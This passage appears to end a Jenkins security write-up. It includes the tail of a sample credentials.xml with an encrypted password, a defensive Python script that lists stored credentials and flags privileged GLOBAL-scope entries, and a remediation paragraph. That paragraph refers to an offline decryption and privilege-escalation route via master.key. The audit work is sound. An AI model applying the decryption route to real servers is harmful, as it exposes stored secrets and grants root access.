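        </com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
        <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          <scope>GLOBAL</scope>
          <id>14f59246-75f6-4a94-921e-4fb9f212ddbe</id>
          <description>Slave node credentials</description>
          <username>trisha</username>
          <password>{AQAAABAAAAAQ9l9lP5ifdP4aZM7+ArwT1dgW0S4mzGV9ikuDXV2VSc4=}</password>
        </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>"""

SECRET_FIELDS = ("password", "passphrase", "privateKeySource", "secret")


def inventory(xml_text):
    """Return one dict per stored credential (type, id, username, scope, description
    and which secret fields are present).  Secret values are never returned."""
    # Jenkins declares XML 1.1, which not every parser accepts; drop the declaration.
    root = ET.fromstring(re.sub(r"^<\?xml[^>]*\?>\s*", "", xml_text))
    items = []
    for cred in root.iter():
        # A credential entry is any element that carries both an <id> and a <scope>.
        if cred.find("id") is None or cred.find("scope") is None:
            continue
        items.append({
            "type": cred.tag.rsplit(".", 1)[-1],
            "id": cred.findtext("id"),
            "username": cred.findtext("username"),
            "scope": cred.findtext("scope"),
            "description": cred.findtext("description") or "",
            "secrets": [c.tag for c in cred if c.tag in SECRET_FIELDS],
        })
    return items


def high_risk(items, privileged=("root", "admin", "administrator")):
    """Ids of credentials that are GLOBAL in scope (usable by every job) and bound
    to a privileged account name.  The name list is an assumption."""
    return [i["id"] for i in items
            if i["scope"] == "GLOBAL" and (i["username"] or "").lower() in privileged]


if __name__ == "__main__":
    entries = inventory(CREDENTIALS_XML)
    for e in entries:
        print(f"{e['type']:32} id={e['id']} user={e['username']} scope={e['scope']} secrets={e['secrets']}")
    print("high risk:", high_risk(entries))
```

A GLOBAL-scope SSH key for root is exactly the kind of entry this flags: every job on the controller can use it, so a single job that a low-privileged user can edit (as shown above) becomes a path to root. Scoping such credentials to a folder or system level, and keeping master.key and hudson.util.Secret out of backups that travel with credentials.xml, removes the offline decryption route used here.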